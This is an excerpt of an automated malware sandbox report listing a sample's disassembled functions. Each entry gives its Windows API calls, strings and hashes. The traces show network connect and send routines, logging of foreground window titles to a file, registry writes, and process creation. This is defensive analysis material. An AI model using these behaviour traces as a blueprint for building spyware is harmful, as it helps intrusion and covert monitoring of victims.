                                                                                            • Instruction ID: 08eeb636138de3797c34374c6eb943b0506bf3902c37e61e03b096e5fa44eda8
                                                                                            • Opcode Fuzzy Hash: b7d3fdecd5ea2782360fd9c3acf0039e04e5a766527cb328f9a1a3ecc5bea19a
                                                                                            • Instruction Fuzzy Hash: DE61D3F1508340AFD360DF65D880EAFB3E9BF88615F044A1EF6998B280E7359545CB9B
                                                                                            Function 009136C7 Relevance: 18.1, APIs: 12, Instructions: 141networkstringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • socket.WS2_32(00000002,00000002,00000011), ref: 009136E7
                                                                                            • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 00913720
                                                                                            • WSACreateEvent.WS2_32 ref: 00913752
                                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,1001D990), ref: 00913764
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,1001D990), ref: 00913770
                                                                                            • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,1001D990), ref: 0091378F
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,1001D990), ref: 0091379B
                                                                                            • gethostbyname.WS2_32(00000000), ref: 009137A9
                                                                                            • htons.WS2_32(?), ref: 009137CF
                                                                                            • WSAEventSelect.WS2_32(?,?,00000030), ref: 009137ED
                                                                                            • connect.WS2_32(?,?,00000010), ref: 00913802
                                                                                            • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,1001D990), ref: 00913811
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharEventMultiWidelstrlen$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                                                                            • String ID:
                                                                                            • API String ID: 1463362053-0
                                                                                            • Opcode ID: 5641118c8b8dc115a13e2bb1be4868842fa0a449038963ca947ee42f98678167
                                                                                            • Instruction ID: d76e0664f5f6aa6cfd29f4a4d9baa06674936c9b8c168bb39460aa14f9623ab7
                                                                                            • Opcode Fuzzy Hash: 5641118c8b8dc115a13e2bb1be4868842fa0a449038963ca947ee42f98678167
                                                                                            • Instruction Fuzzy Hash: 16417071A00219BBE710DBA5CC89FBEB7B8FB88711F148519FA119A2D0D771A944CB60
                                                                                            Function 009155C8 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 68COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: _memset$FreeVirtual
                                                                                            • String ID: !jWW$.$_$i$l${vU_
                                                                                            • API String ID: 974088968-3065862289
                                                                                            • Opcode ID: 2b6eedebc133e2266d96017898138cdc43810d24d5c9c443b0251b8ba9ddad3f
                                                                                            • Instruction ID: ddf422cb001eb879c620a68deabefb6240ca29446841c5e67d105ebf408f68b1
                                                                                            • Opcode Fuzzy Hash: 2b6eedebc133e2266d96017898138cdc43810d24d5c9c443b0251b8ba9ddad3f
                                                                                            • Instruction Fuzzy Hash: E2216BB4B407689AD720DF548C81FAABBB5FF95700F0481C9E14C9A681D7B09A84CF52
                                                                                            Function 034EC860 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 66registrystringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,AppEvents,00000000,00000002,?), ref: 034EC889
                                                                                            • RegDeleteValueW.ADVAPI32(?), ref: 034EC894
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 034EC8A4
                                                                                            • RegCreateKeyW.ADVAPI32(80000001,AppEvents,?), ref: 034EC8C3
                                                                                            • lstrlenW.KERNEL32(?), ref: 034EC8D1
                                                                                            • RegSetValueExW.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 034EC8E4
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 034EC8F2
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 034EC900
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Close$Value$CreateDeleteOpenlstrlen
                                                                                            • String ID: AppEvents$Network
                                                                                            • API String ID: 3935456190-3733486940
                                                                                            • Opcode ID: c7b64bb8b7c24db4cfa4574921c7cdb031500d547e9bc45e0282c120493aa928
                                                                                            • Instruction ID: 27e1fd3e8c4a4337c7e7fa172682e9a968e002ec6300f6dd7cc368eeb72cc25e
                                                                                            • Opcode Fuzzy Hash: c7b64bb8b7c24db4cfa4574921c7cdb031500d547e9bc45e0282c120493aa928
                                                                                            • Instruction Fuzzy Hash: F7118275B00208FBE720DAA5EE89FABB3BCEB05715F104549FA0197250D672AE05DBA4
                                                                                            Function 0304A0AF Relevance: 16.8, APIs: 11, Instructions: 254COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564075355.0000000003040000.00000040.00001000.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_3040000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _memset$swprintf$_malloc
                                                                                            • String ID:
                                                                                            • API String ID: 1873853019-0
                                                                                            • Opcode ID: 062e854903829bf1e59bc273fd803ecd21369289b7c01ee10e87d698f024efb4
                                                                                            • Instruction ID: 9590084d9bc50354833f99412ff3188c234ac61d1aca75f7696f7987f566d7bc
                                                                                            • Opcode Fuzzy Hash: 062e854903829bf1e59bc273fd803ecd21369289b7c01ee10e87d698f024efb4
                                                                                            • Instruction Fuzzy Hash: 0681F7F5A81301ABE720EB54EC85FAB7794AF84310F084174FD195F382E771EA10C6A6
                                                                                            Function 00914C67 Relevance: 16.7, APIs: 11, Instructions: 156COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetLastError.KERNEL32(0000139F,100191B0,100151A4,?,?,00000001), ref: 00914C9D
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 00914CC4
                                                                                            • SetLastError.KERNEL32(0000139F), ref: 00914CD8
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 00914CDF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalErrorLastSection$EnterLeave
                                                                                            • String ID:
                                                                                            • API String ID: 2124651672-0
                                                                                            • Opcode ID: af4dd6d02dae8317ea51440de5c541b076cfcb0791ac4141c68a838fd91fdb3b
                                                                                            • Instruction ID: f3a9f066496cdbd5ba8e169a8a7dcd4d2ab6f271bf6e6489b6bdacb2dc889074
                                                                                            • Opcode Fuzzy Hash: af4dd6d02dae8317ea51440de5c541b076cfcb0791ac4141c68a838fd91fdb3b
                                                                                            • Instruction Fuzzy Hash: 9651A176A04215DFD710DFA8D9857AAF7F4FF88711F04892AE91A8B780E735E840CB91
                                                                                            Function 034E4CB0 Relevance: 16.7, APIs: 11, Instructions: 156COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetLastError.KERNEL32(0000139F,DF800B7B,?,?,?,?,00000000,000000FF,00000000), ref: 034E4CE6
                                                                                            • EnterCriticalSection.KERNEL32(?,DF800B7B,?,?,?,?,00000000,000000FF,00000000), ref: 034E4D0D
                                                                                            • SetLastError.KERNEL32(0000139F,?,?,00000000,000000FF), ref: 034E4D21
                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000,000000FF), ref: 034E4D28
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalErrorLastSection$EnterLeave
                                                                                            • String ID:
                                                                                            • API String ID: 2124651672-0
                                                                                            • Opcode ID: 3fc7258841c67a3c8ae6f2555722c9b16b4a9cbbf82d89f67c5ceb75f9f53398
                                                                                            • Instruction ID: 3829457d8e3292eb307b556bd51307d48a2883b3e0684b0043f40e00c0c2aadf
                                                                                            • Opcode Fuzzy Hash: 3fc7258841c67a3c8ae6f2555722c9b16b4a9cbbf82d89f67c5ceb75f9f53398
                                                                                            • Instruction Fuzzy Hash: 1051BE76A047059FC724EFA9E484B6AB7F4FB88711F044A6FE91A8B740E732A404CB55
                                                                                            Function 0304BD5F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 170COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564075355.0000000003040000.00000040.00001000.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_3040000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _memset$_wcsrchr
                                                                                            • String ID: D
                                                                                            • API String ID: 170005318-2746444292
                                                                                            • Opcode ID: dbe0af0cfe405bfaa2f7670afa9565592a0c6507b5e6e8f9ef5526909d63a184
                                                                                            • Instruction ID: b8b77b99d0d3d3a3f590257b423650cfb49404d16b6dacce5bf680c4364b6278
                                                                                            • Opcode Fuzzy Hash: dbe0af0cfe405bfaa2f7670afa9565592a0c6507b5e6e8f9ef5526909d63a184
                                                                                            • Instruction Fuzzy Hash: 0751E6B594131D7ADB20EBA4CC95FEE73789F54700F4045E5AA0DAA080EB719B84CB66
                                                                                            Function 034EE730 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 74stringtimeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 034EE751
                                                                                            • GetForegroundWindow.USER32(?,74DF23A0,00000000), ref: 034EE759
                                                                                            • GetWindowTextW.USER32(00000000,035116F0,00000800), ref: 034EE76F
                                                                                            • _memset.LIBCMT ref: 034EE78D
                                                                                            • lstrlenW.KERNEL32(035116F0,?,?,?,?,74DF23A0,00000000), ref: 034EE7AC
                                                                                            • GetLocalTime.KERNEL32(?,?,?,?,?,74DF23A0,00000000), ref: 034EE7BD
                                                                                            • wsprintfW.USER32 ref: 034EE804
                                                                                              • Part of subcall function 034EE6B0: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,034EE815,?,?,?,?,74DF23A0,00000000), ref: 034EE6BD
                                                                                              • Part of subcall function 034EE6B0: CreateFileW.KERNEL32(03510D80,40000000,00000002,00000000,00000004,00000002,00000000,?,?,034EE815,?,?,?,?,74DF23A0,00000000), ref: 034EE6D7
                                                                                              • Part of subcall function 034EE6B0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 034EE6F2
                                                                                              • Part of subcall function 034EE6B0: lstrlenW.KERNEL32(?,00000000,00000000), ref: 034EE6FF
                                                                                              • Part of subcall function 034EE6B0: WriteFile.KERNEL32(00000000,?,00000000), ref: 034EE70A
                                                                                              • Part of subcall function 034EE6B0: CloseHandle.KERNEL32(00000000), ref: 034EE711
                                                                                              • Part of subcall function 034EE6B0: ReleaseMutex.KERNEL32(00000000), ref: 034EE71E
                                                                                            • _memset.LIBCMT ref: 034EE820
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File_memset$Windowlstrlen$CloseCreateForegroundHandleLocalMutexObjectPointerReleaseSingleTextTimeWaitWritewsprintf
                                                                                            • String ID: [
                                                                                            • API String ID: 2192163267-4056885943
                                                                                            • Opcode ID: 8de8d56bbf4b3199b611b47389a41c04c57ab3feb6751cb5930bd9ff1e952bd7
                                                                                            • Instruction ID: 95d1de6b009234250c47015edd349f36c40bfed0ce0ee9e4d99b1d8370554723
                                                                                            • Opcode Fuzzy Hash: 8de8d56bbf4b3199b611b47389a41c04c57ab3feb6751cb5930bd9ff1e952bd7
                                                                                            • Instruction Fuzzy Hash: 0E212670900218AAD760EF91DC05FBA73BCFB04701F04819ABA4496154DE755ACADBE8
                                                                                            Function 034E3DE0 Relevance: 15.1, APIs: 10, Instructions: 117memorynetworkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,034E398D,?,00000000,000000FF,00000000), ref: 034E3E05
                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,034E398D,?,00000000,000000FF,00000000), ref: 034E3E50
                                                                                            • send.WS2_32(?,000000FF,00000000,00000000), ref: 034E3E6E
                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 034E3E81
                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 034E3E94
                                                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,034E398D,?,00000000,000000FF,00000000), ref: 034E3EBC
                                                                                            • WSAGetLastError.WS2_32(?,?,034E398D,?,00000000,000000FF,00000000), ref: 034E3EC7
                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,034E398D,?,00000000,000000FF,00000000), ref: 034E3EDB
                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 034E3F14
                                                                                            • HeapFree.KERNEL32(00000000,00000000,?), ref: 034E3F51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeave$FreeHeap$ErrorLastsend
                                                                                            • String ID:
                                                                                            • API String ID: 1701177279-0
                                                                                            • Opcode ID: 196fc7f5309afc00abfc9e7c9693b7cf3486bd3c341c34a62c56532867d58ef2
                                                                                            • Instruction ID: 6b62e0cb2673488f63051558d7a88785f22149cc170b46648ab86b7b1345e454
                                                                                            • Opcode Fuzzy Hash: 196fc7f5309afc00abfc9e7c9693b7cf3486bd3c341c34a62c56532867d58ef2
                                                                                            • Instruction Fuzzy Hash: 044137755047059FC726DFB8D9C8AA7B7F8FB48306F04896EE86ECB244D731A8068B54
                                                                                            Function 00914EE7 Relevance: 15.1, APIs: 10, Instructions: 114timenetworkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(0000000D), ref: 00914F1A
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 00914F2F
                                                                                            • WSASetLastError.WS2_32(00002746), ref: 00914F41
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 00914F48
                                                                                            • timeGetTime.WINMM ref: 00914F76
                                                                                            • timeGetTime.WINMM ref: 00914F9E
                                                                                            • SetEvent.KERNEL32(?), ref: 00914FDC
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 00914FE8
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 00914FEF
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 00915002
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
                                                                                            • String ID:
                                                                                            • API String ID: 1979691958-0
                                                                                            • Opcode ID: 0eddb7f70435084fad788b00feb35f5cb1569ae860eba9b4df7dc0cd97004f8a
                                                                                            • Instruction ID: c8fffe270cc2cd50cdf58b9402cf5d0c7ec807f2cd3cc5d53ca68f2fd2480518
                                                                                            • Opcode Fuzzy Hash: 0eddb7f70435084fad788b00feb35f5cb1569ae860eba9b4df7dc0cd97004f8a
                                                                                            • Instruction Fuzzy Hash: 1A41B331700608DFD7219F68C988BAAB7F9FF4C315F058559E88ACB351D776E8868B81
                                                                                            Function 034E4F30 Relevance: 15.1, APIs: 10, Instructions: 114timenetworkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(0000000D,00000000,000000FF,00000000,000000FF,00000000), ref: 034E4F63
                                                                                            • EnterCriticalSection.KERNEL32(000002FF,00000000,000000FF,00000000,000000FF,00000000), ref: 034E4F78
                                                                                            • WSASetLastError.WS2_32(00002746), ref: 034E4F8A
                                                                                            • LeaveCriticalSection.KERNEL32(000002FF), ref: 034E4F91
                                                                                            • timeGetTime.WINMM ref: 034E4FBF
                                                                                            • timeGetTime.WINMM ref: 034E4FE7
                                                                                            • SetEvent.KERNEL32(?), ref: 034E5025
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 034E5031
                                                                                            • LeaveCriticalSection.KERNEL32(000002FF), ref: 034E5038
                                                                                            • LeaveCriticalSection.KERNEL32(000002FF), ref: 034E504B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
                                                                                            • String ID:
                                                                                            • API String ID: 1979691958-0
                                                                                            • Opcode ID: af4212e86519177bf68e1eaadba34aa29348bcba68359b724c5bcca665f41f91
                                                                                            • Instruction ID: 6bade82eadc4af534f4eda0ca9c32a434ae57d6d0bf1ae05226e28aa9e711c42
                                                                                            • Opcode Fuzzy Hash: af4212e86519177bf68e1eaadba34aa29348bcba68359b724c5bcca665f41f91
                                                                                            • Instruction Fuzzy Hash: FF4126312003019FC730EF6AD588A7BB7E9FF4871AF08499AE44ACB751E336E4058B84
                                                                                            Function 034EC270 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98filestringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 034EC2AE
                                                                                            • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 034EC2CC
                                                                                            • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 034EC309
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 034EC314
                                                                                            • lstrlenW.KERNEL32(?), ref: 034EC321
                                                                                            • wsprintfW.USER32 ref: 034EC345
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$CloseCreateHandleWrite_memsetlstrlenwsprintf
                                                                                            • String ID: %s %s
                                                                                            • API String ID: 1326869720-2939940506
                                                                                            • Opcode ID: 37b039f88778ac8d31eff9fdd6af5aed0ddb6203e89cae007d60dd144c71c90b
                                                                                            • Instruction ID: 3246eba0e97e67e623079d1ab715c6c92a8e237ccb78374a85ac3cc5f953fd23
                                                                                            • Opcode Fuzzy Hash: 37b039f88778ac8d31eff9fdd6af5aed0ddb6203e89cae007d60dd144c71c90b
                                                                                            • Instruction Fuzzy Hash: EC31A4326402186FDB24EB64DC89FEF7378EB45312F44069AFA15AA1C0DA315E49CFA5
                                                                                            Function 034EC980 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 88processstringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(?), ref: 034EC98D
                                                                                            • _wcsrchr.LIBCMT ref: 034EC9C7
                                                                                              • Part of subcall function 034E7C80: LoadLibraryW.KERNEL32(wininet.dll), ref: 034E7CC3
                                                                                              • Part of subcall function 034E7C80: GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 034E7CD7
                                                                                              • Part of subcall function 034E7C80: FreeLibrary.KERNEL32(00000000), ref: 034E7CF7
                                                                                            • GetFileAttributesW.KERNEL32(-00000002), ref: 034EC9E6
                                                                                            • GetLastError.KERNEL32 ref: 034EC9F1
                                                                                            • _memset.LIBCMT ref: 034ECA04
                                                                                            • CreateProcessW.KERNEL32(00000000,-00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 034ECA31
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Library$AddressAttributesCreateErrorFileFreeLastLoadProcProcess_memset_wcsrchrlstrlen
                                                                                            • String ID: D$WinSta0\Default
                                                                                            • API String ID: 174883095-1101385590
                                                                                            • Opcode ID: e9621c3a74240192facb74f2b68672392420078eeaec355bb55abeb0506b6df0
                                                                                            • Instruction ID: 7a696d8610cea6c369e72707bb993ca0f3270c78af105035bda02f4f1b089c29
                                                                                            • Opcode Fuzzy Hash: e9621c3a74240192facb74f2b68672392420078eeaec355bb55abeb0506b6df0
                                                                                            • Instruction Fuzzy Hash: 49110DB79002082BD720E7B59C85FBFB76CDB45715F08012BFA05DE2C4E636D905D6A9
                                                                                            Function 034E8159 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 58stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • lstrcmpiW.KERNEL32(?,A:\), ref: 034E8166
                                                                                            • lstrcmpiW.KERNEL32(?,B:\), ref: 034E8176
                                                                                            • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 034E81A6
                                                                                            • lstrlenW.KERNEL32(?), ref: 034E81B7
                                                                                            • __wcsnicmp.LIBCMT ref: 034E81CE
                                                                                            • lstrcpyW.KERNEL32(00000AD4,?), ref: 034E8204
                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 034E8228
                                                                                            • lstrcatW.KERNEL32(?,00000000), ref: 034E8233
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: lstrcmpilstrcpy$DeviceQuery__wcsnicmplstrcatlstrlen
                                                                                            • String ID: A:\$B:\
                                                                                            • API String ID: 4249875308-1009255891
                                                                                            • Opcode ID: 75bdb249d1a6fb39de7e914df260ae83b7cacc6bbe014ffb7e2fbda36a7d4e8b
                                                                                            • Instruction ID: 4c5caac4410d6052d9e40c77406be87e91a7490e00ee629b184c6ccce7359767
                                                                                            • Opcode Fuzzy Hash: 75bdb249d1a6fb39de7e914df260ae83b7cacc6bbe014ffb7e2fbda36a7d4e8b
                                                                                            • Instruction Fuzzy Hash: E8118131A00219DBDF20EF90DC44BEEB378EF44605F044499DE0AA7240E771EA09CB95
                                                                                            Function 034E9730 Relevance: 13.7, APIs: 9, Instructions: 195timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,DF800B7B,00000000,?,?,?,00000000,0350125B,000000FF,?,034EE04E,00000000), ref: 034E9773
                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(034EE1AE,00000000,?,?,?,00000000,0350125B,000000FF,?,034EE04E), ref: 034E9812
                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0350125B,000000FF,?,034EE04E), ref: 034E9850
                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0350125B,000000FF,?,034EE04E), ref: 034E9875
                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0350125B,000000FF,?,034EE04E), ref: 034E989A
                                                                                              • Part of subcall function 034E1280: __CxxThrowException@8.LIBCMT ref: 034E1290
                                                                                              • Part of subcall function 034E1280: DeleteCriticalSection.KERNEL32(00000000,034ED3E6,03506624,?,?,034ED3E6,?,?,?,?,03505A40,00000000), ref: 034E12A1
                                                                                              • Part of subcall function 034ECE10: InitializeCriticalSectionAndSpinCount.KERNEL32(034EE076,00000000,DF800B7B,034EE04E,74DF2F60,00000000,?,034EE226,0350110B,000000FF,?,034E994A,034EE226), ref: 034ECE67
                                                                                              • Part of subcall function 034ECE10: InitializeCriticalSectionAndSpinCount.KERNEL32(034EE08E,00000000,?,034EE226,0350110B,000000FF,?,034E994A,034EE226,?,?,?,00000000,0350125B,000000FF), ref: 034ECE83
                                                                                            • InterlockedExchange.KERNEL32(034EE066,00000000), ref: 034E99A0
                                                                                            • timeGetTime.WINMM(?,?,?,00000000,0350125B,000000FF,?,034EE04E), ref: 034E99A6
                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00000000,0350125B,000000FF,?,034EE04E), ref: 034E99B4
                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0350125B,000000FF,?,034EE04E), ref: 034E99BD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
                                                                                            • String ID:
                                                                                            • API String ID: 1400036169-0
                                                                                            • Opcode ID: 7c359ca3a97526145885571a37b8c29c61d9a144737e06b73c0e1ce5d812baa2
                                                                                            • Instruction ID: c89faefda9304074c2dde9ea05e6f5e17497939c532e1e1f36ec542251cca914
                                                                                            • Opcode Fuzzy Hash: 7c359ca3a97526145885571a37b8c29c61d9a144737e06b73c0e1ce5d812baa2
                                                                                            • Instruction Fuzzy Hash: AB81E7B0A01A46BFD344DF7AC884B9AFBA8FB08304F50462ED12CDB650D775A964CF94
                                                                                            Function 034E3500 Relevance: 13.6, APIs: 9, Instructions: 116COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 034E3660: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 034E3667
                                                                                              • Part of subcall function 034E3660: _free.LIBCMT ref: 034E369C
                                                                                              • Part of subcall function 034E3660: _malloc.LIBCMT ref: 034E36D7
                                                                                              • Part of subcall function 034E3660: _memset.LIBCMT ref: 034E36E5
                                                                                            • InterlockedIncrement.KERNEL32(03511F0C), ref: 034E3565
                                                                                            • InterlockedIncrement.KERNEL32(03511F0C), ref: 034E3573
                                                                                            • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 034E359A
                                                                                            • setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 034E35B3
                                                                                            • ResetEvent.KERNEL32(?,?,?,03511F0C), ref: 034E35EE
